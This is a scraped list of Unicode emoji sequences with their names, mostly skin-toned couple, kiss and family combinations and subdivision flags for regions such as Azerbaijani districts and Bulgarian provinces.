👨❤️👩🏾 Couple With Heart - Man, Woman: Medium-Dark Skin Tone
🏴 Flag for Sekong (LA-XE)
🏴 Flag for Gorj (RO-GJ)
👨🏻❤️👨 Couple With Heart - Man: Light Skin Tone, Man
🏴 Flag for Kurdamir (AZ-KUR)
👩🏻👨🏻👦🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Kalbajar (AZ-KAL)
🏴 Flag for Gadabay (AZ-GAD)
🏴 Flag for Lachin (AZ-LAC)
🏴 Flag for Lankaran (AZ-LA)
🏴 Flag for Ho Chi Minh City (VN-SG)
🏴 Flag for Lerik (AZ-LER)
🏴 Flag for Mingachevir (AZ-MI)
👩🏾👨🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Naftalan (AZ-NA)
🏴 Flag for Masally (AZ-MAS)
👨❤️👩 Couple With Heart - Man, Woman
🏴 Flag for Lankaran District (AZ-LAN)
👩🏼👨🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽❤️💋👨🏾 Kiss - Woman: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Neftchala (AZ-NEF)
🏴 Flag for Nakhchivan AR (AZ-NX)
🏴 Flag for Celje (SI-011)
🏴 Flag for Panevėžio Municipality (LT-32)
👩🏿❤️💋👩🏽 Kiss - Woman: Dark Skin Tone, Woman: Medium Skin Tone
👨🏻❤️👩🏿 Couple With Heart - Man: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Ismailli (AZ-ISM)
Tag Latin Small Letter H
👩🏾❤️👨🏻 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Light Skin Tone
👩🏻👶🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Nana-Mambéré (CF-NM)
🏴 Flag for Gobustan (AZ-QOB)
👩🏿❤️💋👨🏻 Kiss - Woman: Dark Skin Tone, Man: Light Skin Tone
👩🏿❤️💋👩🏿 Kiss - Woman: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Qubadli (AZ-QBI)
🏴 Flag for Qazakh (AZ-QAZ)
🏴 Flag for Braşov (RO-BV)
👨👩👧👶 Family: Man, Woman, Girl, Baby
🏴 Flag for Quba (AZ-QBA)
🏴 Flag for Qabala (AZ-QAB)
🏴 Flag for Uri (CH-UR)
🏴 Flag for Oghuz (AZ-OGU)
🏴 Flag for Qakh (AZ-QAX)
🏴 Flag for Šmarješke Toplice (SI-206)
👨🏾❤️💋👩🏿 Kiss - Man: Medium-Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Saint Peter (AG-07)
👨🏻👩🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Maryland (LR-MY)
🏴 Flag for South Australia (AU-SA)
🏴 Flag for Qusar (AZ-QUS)
🏴 Flag for Sabirabad (AZ-SAB)
👨❤️👩🏽 Couple With Heart - Man, Woman: Medium Skin Tone
👨❤️👩🏼 Couple With Heart - Man, Woman: Medium-Light Skin Tone
🏴 Flag for Saatly (AZ-SAT)
🏴 Flag for Shabran (AZ-SBN)
👨🏼❤️👩🏽 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Shaki District (AZ-SAK)
🏴 Flag for Casanare (CO-CAS)
👨👩👶👶 Family: Man, Woman, Baby, Baby
🏴 Flag for Shirvan (AZ-SR)
🏴 Flag for Shusha (AZ-SUS)
🏴 Flag for Valais (CH-VS)
👩🏽👶🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone
👩🏻❤️💋👨🏿 Kiss - Woman: Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Shaki (AZ-SA)
🏴 Flag for Martinique (FR-MQ)
🏴 Flag for Sumqayit (AZ-SM)
🏴 Flag for Siazan (AZ-SIY)
🏴 Flag for Shamakhi (AZ-SMI)
👩🏿❤️💋👨 Kiss - Woman: Dark Skin Tone, Man
🏴 Flag for Samukh (AZ-SMX)
👨🏻👩🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Tovuz (AZ-TOV)
🏴 Flag for Khachmaz (AZ-XAC)
🏴 Flag for Ujar (AZ-UCA)
🏴 Flag for Tartar (AZ-TAR)
👨🏿❤️💋👨🏻 Kiss - Man: Dark Skin Tone, Man: Light Skin Tone
👩🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👩🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Khizi (AZ-XIZ)
👨🏽❤️👨🏼 Couple With Heart - Man: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Khojali (AZ-XCI)
🏴 Flag for Delta Amacuro (VE-Y)
🏴 Flag for Stepanakert (AZ-XA)
🏴 Flag for Yardymli (AZ-YAR)
🏴 Flag for Yevlakh District (AZ-YEV)
🏴 Flag for Zaqatala (AZ-ZAQ)
👩🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Yevlakh (AZ-YE)
🏴 Flag for Federation of Bosnia and Herzegovina (BA-BIH)
🏴 Flag for Zardab (AZ-ZAR)
🏴 Flag for Salyan (AZ-SAL)
🏴 Flag for Zug (CH-ZG)
👨🏾👩🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👩🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏿👶🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Republika Srpska (BA-SRP)
👨🏽❤️👩 Couple With Heart - Man: Medium Skin Tone, Woman
👨🏻👩🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Andalusia (ES-AN)
👨🏼👩🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Saint James (BB-04)
👨🏾❤️👩🏼 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Saint George (BB-03)
🏴 Flag for Saint Andrew (BB-02)
👨👩👶👦 Family: Man, Woman, Baby, Boy
👨🏽👩🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Saint John (BB-05)
👨🏾👩🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Saint Joseph (BB-06)
🏴 Flag for Western (LK-1)
🏴 Flag for Brest (BY-BR)
🏴 Flag for Shamkir (AZ-SKR)
🏴 Flag for Saint Lucy (BB-07)
👩🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Castile-La Mancha (ES-CM)
🏴 Flag for Saint Philip (BB-10)
🏴 Flag for Saint George (VC-04)
👨🏻👩🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Barisal (BD-A)
🏴 Flag for Zangilan (AZ-ZAN)
🏴 Flag for Kingston (JM-01)
👨🏼👩🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Rajshahi Division (BD-E)
🏴 Flag for Rangpur Division (BD-F)
🏴 Flag for Dhaka Division (BD-C)
🏴 Flag for Khulna Division (BD-D)
🏴 Flag for Saint Peter (BB-09)
🏴 Flag for Lenart (SI-058)
👩🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Cascades (BF-02)
🏴 Flag for Mymensingh Division (BD-H)
🏴 Flag for Wallonia (BE-WAL)
🏴 Flag for Beau-Bassin Rose-Hill (MU-BR)
🏴 Flag for Centre-Est (BF-04)
🏴 Flag for Hong Kong SAR China (CN-91)
🏴 Flag for Boucle du Mouhoun (BF-01)
🏴 Flag for Centre (BF-03)
🏴 Flag for Central Denmark (DK-82)
🏴 Flag for Centre-Sud (BF-07)
👨🏽👩🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Centre-Ouest (BF-06)
🏴 Flag for Centre-Nord (BF-05)
🏴 Flag for Saint Michael (BB-08)
🏴 Flag for Saint Thomas (BB-11)
👨🏽❤️👩🏿 Couple With Heart - Man: Medium Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Est (BF-08)
🏴 Flag for Brussels (BE-BRU)
🏴 Flag for Sylhet Division (BD-G)
🏴 Flag for Plateau-Central (BF-11)
🏴 Flag for Chittagong Division (BD-B)
🏴 Flag for Sud-Ouest (BF-13)
👨🏾👩🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Vidin (BG-05)
🏴 Flag for Varna (BG-03)
👨🏿❤️👩🏽 Couple With Heart - Man: Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Burgas (BG-02)
🏴 Flag for Nord (BF-10)
🏴 Flag for Veliko Tarnovo (BG-04)
👨🏽👩🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Gabrovo (BG-07)
👨🏿👩🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Dobrich (BG-08)
🏴 Flag for Sahel (BF-12)
🏴 Flag for Tasmania (AU-TAS)
👨🏿❤️👩🏻 Couple With Heart - Man: Dark Skin Tone, Woman: Light Skin Tone
👩🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
👨🏻👩🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👨🏼👩🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏾❤️💋👩🏾 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Khojavend (AZ-XVD)
🏴 Flag for Lovech (BG-11)
🏴 Flag for Libertador General Bernardo O’Higgins (CL-LI)
🏴 Flag for Pazardzhik (BG-13)
👨🏿❤️👩🏿 Couple With Heart - Man: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Pernik (BG-14)
🏴 Flag for Kyustendil (BG-10)
🏴 Flag for Red Sea (EG-BA)
🏴 Flag for Zanzibar Central/South (TZ-11)
👨🏿👩🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Pleven (BG-15)
👨🏿👨🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
👨🏽👩🏽👶🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Smolyan (BG-21)
🏴 Flag for Blagoevgrad (BG-01)
🏴 Flag for Bordj Bou Arréridj (DZ-34)
🏴 Flag for Plovdiv (BG-16)
🏴 Flag for Vallée du Bandama (CI-VB)
🏴 Flag for Silistra (BG-19)
👩❤️👨🏼 Couple With Heart - Woman, Man: Medium-Light Skin Tone
🏴 Flag for Razgrad (BG-17)
👨🏾❤️👨 Couple With Heart - Man: Medium-Dark Skin Tone, Man
🏴 Flag for Cunene (AO-CNN)
🏴 Flag for Sliven (BG-20)
🧕🏻♀️ Woman With Headscarf: Light Skin Tone
🏴 Flag for Targovishte (BG-25)
👩🏼👩🏼👶🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏾👩🏾👶🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Sofia District (BG-23)
🏴 Flag for Sofia (BG-22)
👨🏿👩🏿👧🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👨🏻❤️💋👩🏾 Kiss - Man: Light Skin Tone, Woman: Medium-Dark Skin Tone
🧕🏽♀️ Woman With Headscarf: Medium Skin Tone
🏴 Flag for Yambol (BG-28)
🏴 Flag for Capital (BH-13)
🏴 Flag for Haskovo (BG-26)
🏴 Flag for Schaan (LI-07)
👨🏿👩🏿👶🏿👧🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Muharraq (BH-15)
🏴 Flag for Southern (BH-14)
🧕🏾♀️ Woman With Headscarf: Medium-Dark Skin Tone
🏴 Flag for Sibiu (RO-SB)
🧕🏼♀️ Woman With Headscarf: Medium-Light Skin Tone
👩🏻❤️👨🏿 Couple With Heart - Woman: Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Northern (BH-17)
🏴 Flag for Bubanza (BI-BB)
👩🏻❤️👩 Couple With Heart - Woman: Light Skin Tone, Woman
🏴 Flag for Flanders (BE-VLG)
👩🏽👧🏽 Family - Woman: Medium Skin Tone, Girl: Medium Skin Tone
👨🏻👩🏻👶🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Bujumbura (BI-BM)
🧕🏿♀️ Woman With Headscarf: Dark Skin Tone
🏴 Flag for Bujumbura Rural (BI-BL)
👨🏾❤️💋👩🏽 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium Skin Tone
👨🏼👩🏼👶🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏻👨🏻👦🏻👶🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Cankuzo (BI-CA)
🏴 Flag for Montana (BG-12)
🏴 Flag for Sala (LV-085)
⃣ Combining Enclosing Keycap
🏴 Flag for Bururi (BI-BR)
🏴 Flag for Kardzhali (BG-09)
🏴 Flag for Rumonge (BI-RM)
🏴 Flag for Aruba (NL-AW)
🏴 Flag for Muyinga (BI-MY)
🏴 Flag for Rutana (BI-RT)
🏴 Flag for Ruyigi (BI-RY)
🏴 Flag for Kirundo (BI-KI)
🏴 Flag for Kayanza (BI-KY)
🏴 Flag for Mwaro (BI-MW)
🏴 Flag for Shumen (BG-27)
🏴 Flag for Ngozi (BI-NG)
🏴 Flag for Karuzi (BI-KR)
🏴 Flag for Muramvya (BI-MU)
🏴 Flag for Laâyoune-Boujdour-Sakia El Hamra (MA-15)
👨🏽👩🏽👶🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏾👩🏾👶🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Donga (BJ-DO)
👩🏽👨🏽👶🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
👨🏽❤️💋👩🏼 Kiss - Man: Medium Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Hauts-de-France (FR-HDF)
🏴 Flag for Alibori (BJ-AL)
🏴 Flag for Atakora (BJ-AK)
👨🏿👩🏿👶🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Littoral (BJ-LI)
🏴 Flag for Borgou (BJ-BO)
👩👩👧👶 Family: Woman, Woman, Girl, Baby
🏴 Flag for North Dakota (US-ND)
👨🏼❤️💋👨🏾 Kiss - Man: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Kouffo (BJ-KO)
🏴 Flag for Plateau (BJ-PL)
🏴 Flag for Carriacou and Petite Martinique (GD-10)
🏴 Flag for Zou (BJ-ZO)
👩🏼❤️👨🏻 Couple With Heart - Woman: Medium-Light Skin Tone, Man: Light Skin Tone
👩🏽❤️👨🏽 Couple With Heart - Woman: Medium Skin Tone, Man: Medium Skin Tone
👨🏽❤️👩🏼 Couple With Heart - Man: Medium Skin Tone, Woman: Medium-Light Skin Tone
👩🏽❤️👨🏻 Couple With Heart - Woman: Medium Skin Tone, Man: Light Skin Tone
🏴 Flag for Beqaa (LB-BI)
🏴 Flag for Temburong (BN-TE)
👩🏻👦🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Tutong (BN-TU)
🏴 Flag for Brunei-Muara (BN-BM)
👨🏻👩🏻👦🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Vratsa (BG-06)
👩🏽❤️👨🏼 Couple With Heart - Woman: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Beni (BO-B)
🏴 Flag for Belait (BN-BE)
👩🏼❤️👨 Couple With Heart - Woman: Medium-Light Skin Tone, Man
🏴 Flag for Ouémé (BJ-OU)
👩🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Roche Caiman (SC-25)
👩🏻❤️👨🏾 Couple With Heart - Woman: Light Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Cochabamba (BO-C)
👨🏾👩🏾👧🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Pando (BO-N)
👩🏽❤️👩🏻 Couple With Heart - Woman: Medium Skin Tone, Woman: Light Skin Tone
👩🏾❤️👨🏽 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for Chuquisaca (BO-H)
🏴 Flag for La Paz (BO-L)
🏴 Flag for Khentii (MN-039)
🕴🏽♀️ Woman in Business Suit Levitating: Medium Skin Tone
🏴 Flag for Dolneni (MK-27)
🏴 Flag for Stara Zagora (BG-24)
👩🏽👦🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Sistan and Baluchestan (IR-13)
👩🏾❤️👨🏼 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Potosí (BO-P)
🏴 Flag for Bonaire (BQ-BO)
👩❤️💋👨🏻 Kiss - Woman, Man: Light Skin Tone
👩🏾❤️👨 Couple With Heart - Woman: Medium-Dark Skin Tone, Man
👩🏼👦🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Brčko District (BA-BRC)
🏴 Flag for Saba (BQ-SA)
👩🏽❤️👨🏾 Couple With Heart - Woman: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩🏾❤️👨🏿 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Dark Skin Tone
🏴 Flag for Acre (BR-AC)
🏴 Flag for Gitega (BI-GI)
👩🏿👦🏿 Family - Woman: Dark Skin Tone, Boy: Dark Skin Tone
👩🏿❤️👨🏻 Couple With Heart - Woman: Dark Skin Tone, Man: Light Skin Tone
🏴 Flag for Amazonas (BR-AM)
🏴 Flag for Buenos Aires (AR-C)
👨🏼👩🏼👧🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👨🏼❤️💋👨🏼 Kiss - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Espírito Santo (BR-ES)
👨🏿❤️💋👨🏾 Kiss - Man: Dark Skin Tone, Man: Medium-Dark Skin Tone
👨🏼❤️💋👨🏽 Kiss - Man: Medium-Light Skin Tone, Man: Medium Skin Tone
👩🏾👦🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨🏻❤️👩 Couple With Heart - Man: Light Skin Tone, Woman
👨🏿❤️💋👩🏾 Kiss - Man: Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩🏻❤️💋👩🏽 Kiss - Woman: Light Skin Tone, Woman: Medium Skin Tone
👨🏼❤️💋👨🏿 Kiss - Man: Medium-Light Skin Tone, Man: Dark Skin Tone
👩🏽👦🏽👦🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏿❤️👩🏼 Couple With Heart - Woman: Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Maranhão (BR-MA)
👩🏿❤️👩🏽 Couple With Heart - Woman: Dark Skin Tone, Woman: Medium Skin Tone
👩🏿❤️👩 Couple With Heart - Woman: Dark Skin Tone, Woman
🏴 Flag for Amapá (BR-AP)
👨🏽❤️👨🏻 Couple With Heart - Man: Medium Skin Tone, Man: Light Skin Tone
👩🏻❤️💋👨🏻 Kiss - Woman: Light Skin Tone, Man: Light Skin Tone
👨🏽❤️💋👨🏽 Kiss - Man: Medium Skin Tone, Man: Medium Skin Tone
👩🏿❤️💋👩🏻 Kiss - Woman: Dark Skin Tone, Woman: Light Skin Tone
👨🏽❤️💋👩🏿 Kiss - Man: Medium Skin Tone, Woman: Dark Skin Tone
👩🏼❤️💋👨🏾 Kiss - Woman: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏿❤️💋👨🏼 Kiss - Man: Dark Skin Tone, Man: Medium-Light Skin Tone
👨🏾❤️💋👨🏿 Kiss - Man: Medium-Dark Skin Tone, Man: Dark Skin Tone
👩🏽❤️💋👩🏿 Kiss - Woman: Medium Skin Tone, Woman: Dark Skin Tone
👩🏼❤️💋👨🏿 Kiss - Woman: Medium-Light Skin Tone, Man: Dark Skin Tone
👨🏽❤️💋👩🏽 Kiss - Man: Medium Skin Tone, Woman: Medium Skin Tone
👨🏾❤️💋👨🏼 Kiss - Man: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
👨🏽❤️💋👩🏻 Kiss - Man: Medium Skin Tone, Woman: Light Skin Tone
👨🏾❤️💋👨 Kiss - Man: Medium-Dark Skin Tone, Man
👨🏾❤️💋👨🏾 Kiss - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👩❤️💋👨🏾 Kiss - Woman, Man: Medium-Dark Skin Tone
👩❤️💋👩🏻 Kiss - Woman, Woman: Light Skin Tone
👩🏽❤️💋👨🏻 Kiss - Woman: Medium Skin Tone, Man: Light Skin Tone
👩🏿❤️💋👨🏿 Kiss - Woman: Dark Skin Tone, Man: Dark Skin Tone
👩🏻❤️💋👩🏿 Kiss - Woman: Light Skin Tone, Woman: Dark Skin Tone
👩🏻❤️💋👩🏼 Kiss - Woman: Light Skin Tone, Woman: Medium-Light Skin Tone
👩🏾❤️💋👩🏿 Kiss - Woman: Medium-Dark Skin Tone, Woman: Dark Skin Tone
👩🏾❤️💋👩 Kiss - Woman: Medium-Dark Skin Tone, Woman
👩🏾❤️💋👩🏻 Kiss - Woman: Medium-Dark Skin Tone, Woman: Light Skin Tone
👩🏻❤️👨 Couple With Heart - Woman: Light Skin Tone, Man
👩🏻👩🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone
👩🏾❤️💋👨🏾 Kiss - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone
👨🏻❤️👨🏽 Couple With Heart - Man: Light Skin Tone, Man: Medium Skin Tone
🏴 Flag for Mato Grosso (BR-MT)
👨🏽❤️👩🏻 Couple With Heart - Man: Medium Skin Tone, Woman: Light Skin Tone
👨❤️👨🏿 Couple With Heart - Man, Man: Dark Skin Tone
👩🏿❤️💋👨🏼 Kiss - Woman: Dark Skin Tone, Man: Medium-Light Skin Tone
👩🏿❤️💋👩🏾 Kiss - Woman: Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩🏻👦🏻👧🏻 Family - Woman: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Santa Cruz (BO-S)
👨🏻❤️👩🏽 Couple With Heart - Man: Light Skin Tone, Woman: Medium Skin Tone
👨🏽❤️👩🏽 Couple With Heart - Man: Medium Skin Tone, Woman: Medium Skin Tone
👩🏾❤️💋👩🏽 Kiss - Woman: Medium-Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Collines (BJ-CO)
👨🏻👩🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone
👨❤️👨🏽 Couple With Heart - Man, Man: Medium Skin Tone
👨🏾👩🏾👦🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👨🏼❤️👨 Couple With Heart - Man: Medium-Light Skin Tone, Man
👨🏾❤️👩🏽 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Pará (BR-PA)
👩🏽👦🏽👧🏽 Family - Woman: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👨🏼❤️👨🏼 Couple With Heart - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone
👨🏿❤️👨🏻 Couple With Heart - Man: Dark Skin Tone, Man: Light Skin Tone
👩🏽❤️👩🏽 Couple With Heart - Woman: Medium Skin Tone, Woman: Medium Skin Tone
👨🏾❤️👨🏽 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Medium Skin Tone
👨🏽❤️👨🏽 Couple With Heart - Man: Medium Skin Tone, Man: Medium Skin Tone
👨🏻❤️👩🏼 Couple With Heart - Man: Light Skin Tone, Woman: Medium-Light Skin Tone
👨🏾❤️👩🏿 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Dark Skin Tone
👨🏾❤️👨🏼 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Medium-Light Skin Tone
👩🏾❤️💋👩🏾 Kiss - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
👩🏼❤️👩🏻 Couple With Heart - Woman: Medium-Light Skin Tone, Woman: Light Skin Tone
👨🏿❤️👩🏼 Couple With Heart - Man: Dark Skin Tone, Woman: Medium-Light Skin Tone
👨🏼❤️👨🏾 Couple With Heart - Man: Medium-Light Skin Tone, Man: Medium-Dark Skin Tone
👨🏽❤️👨🏾 Couple With Heart - Man: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩❤️👨🏾 Couple With Heart - Woman, Man: Medium-Dark Skin Tone
🏴 Flag for Alagoas (BR-AL)
👩❤️👨🏻 Couple With Heart - Woman, Man: Light Skin Tone
🏴 Flag for Hauts-Bassins (BF-09)
👨🏼👦🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏾❤️👩🏾 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Rio de Janeiro (BR-RJ)
👨🏾❤️💋👩🏻 Kiss - Man: Medium-Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Rondônia (BR-RO)
👨🏾❤️👨🏿 Couple With Heart - Man: Medium-Dark Skin Tone, Man: Dark Skin Tone
👨🏽👦🏽 Family - Man: Medium Skin Tone, Boy: Medium Skin Tone
👨🏼❤️👨🏽 Couple With Heart - Man: Medium-Light Skin Tone, Man: Medium Skin Tone
🏴 Flag for Piauí (BR-PI)
👨🏽👩🏽👦🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Rio Grande do Norte (BR-RN)
👩🏻❤️👨🏻 Couple With Heart - Woman: Light Skin Tone, Man: Light Skin Tone
👨🏻👦🏻 Family - Man: Light Skin Tone, Boy: Light Skin Tone
